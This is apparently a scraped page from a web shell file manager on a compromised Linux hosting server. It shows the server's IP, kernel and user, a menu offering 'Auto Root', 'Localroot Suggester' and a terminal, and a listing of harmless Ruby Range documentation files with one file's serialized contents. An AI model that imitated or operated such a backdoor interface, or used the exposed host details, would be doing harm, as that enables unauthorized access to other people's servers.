Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby26 /
share /
ri /
2.6.0 /
system /
Range /
Delete
Unzip
Name
Size
Permission
Date
Action
%25-i.ri
1.37
KB
-rw-r--r--
2023-07-26 18:33
%3d%3d%3d-i.ri
774
B
-rw-r--r--
2023-07-26 18:33
%3d%3d-i.ri
681
B
-rw-r--r--
2023-07-26 18:33
as_json-i.ri
370
B
-rw-r--r--
2023-07-26 18:33
begin-i.ri
434
B
-rw-r--r--
2023-07-26 18:33
bsearch-i.ri
2.57
KB
-rw-r--r--
2023-07-26 18:33
cdesc-Range.ri
4.19
KB
-rw-r--r--
2023-07-26 18:33
cover%3f-i.ri
1.45
KB
-rw-r--r--
2023-07-26 18:33
each-i.ri
938
B
-rw-r--r--
2023-07-26 18:33
end-i.ri
451
B
-rw-r--r--
2023-07-26 18:33
entries-i.ri
539
B
-rw-r--r--
2023-07-26 18:33
eql%3f-i.ri
693
B
-rw-r--r--
2023-07-26 18:33
exclude_end%3f-i.ri
520
B
-rw-r--r--
2023-07-26 18:33
first-i.ri
533
B
-rw-r--r--
2023-07-26 18:33
hash-i.ri
530
B
-rw-r--r--
2023-07-26 18:33
include%3f-i.ri
698
B
-rw-r--r--
2023-07-26 18:33
inspect-i.ri
413
B
-rw-r--r--
2023-07-26 18:33
json_create-c.ri
418
B
-rw-r--r--
2023-07-26 18:33
last-i.ri
754
B
-rw-r--r--
2023-07-26 18:33
max-i.ri
832
B
-rw-r--r--
2023-07-26 18:33
member%3f-i.ri
696
B
-rw-r--r--
2023-07-26 18:33
min-i.ri
839
B
-rw-r--r--
2023-07-26 18:33
new-c.ri
529
B
-rw-r--r--
2023-07-26 18:33
size-i.ri
617
B
-rw-r--r--
2023-07-26 18:33
step-i.ri
1.38
KB
-rw-r--r--
2023-07-26 18:33
to_a-i.ri
533
B
-rw-r--r--
2023-07-26 18:33
to_json-i.ri
482
B
-rw-r--r--
2023-07-26 18:33
to_s-i.ri
383
B
-rw-r--r--
2023-07-26 18:33
Save
Rename
U:RDoc::AnyMethod[iI" step:ETI"Range#step;TF:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [ I"RIterates over the range, passing each <code>n</code>th element to the block. ;TI"DIf begin and end are numeric, +n+ is added for each iteration. ;TI"NOtherwise <code>step</code> invokes <code>succ</code> to iterate through ;TI"range elements.;To:RDoc::Markup::BlankLine o; ; [I">If no block is given, an enumerator is returned instead. ;TI"EEspecially, the enumerator is an Enumerator::ArithmeticSequence ;TI"/if begin and end of the range are numeric.;T@o:RDoc::Markup::Verbatim; [ I"#range = Xs.new(1)..Xs.new(10) ;TI" range.step(2) {|x| puts x} ;TI" puts ;TI" range.step(3) {|x| puts x} ;T:@format0o; ; [I"<em>produces:</em>;T@o;; [I" 1 x ;TI" 3 xxx ;TI" 5 xxxxx ;TI" 7 xxxxxxx ;TI" 9 xxxxxxxxx ;TI" ;TI" 1 x ;TI" 4 xxxx ;TI" 7 xxxxxxx ;TI"10 xxxxxxxxxx ;T; 0o; ; [I".See Range for the definition of class Xs.;T: @fileI"range.c;T:0@omit_headings_from_table_of_contents_below0I"rng.step(n=1) {| obj | block } -> rng rng.step(n=1) -> an_enumerator rng.step(n=1) -> an_arithmetic_sequence rng % n -> an_enumerator rng % n -> an_arithmetic_sequence ;T0[ I"(*args);T@/FI" Range;TcRDoc::NormalClass00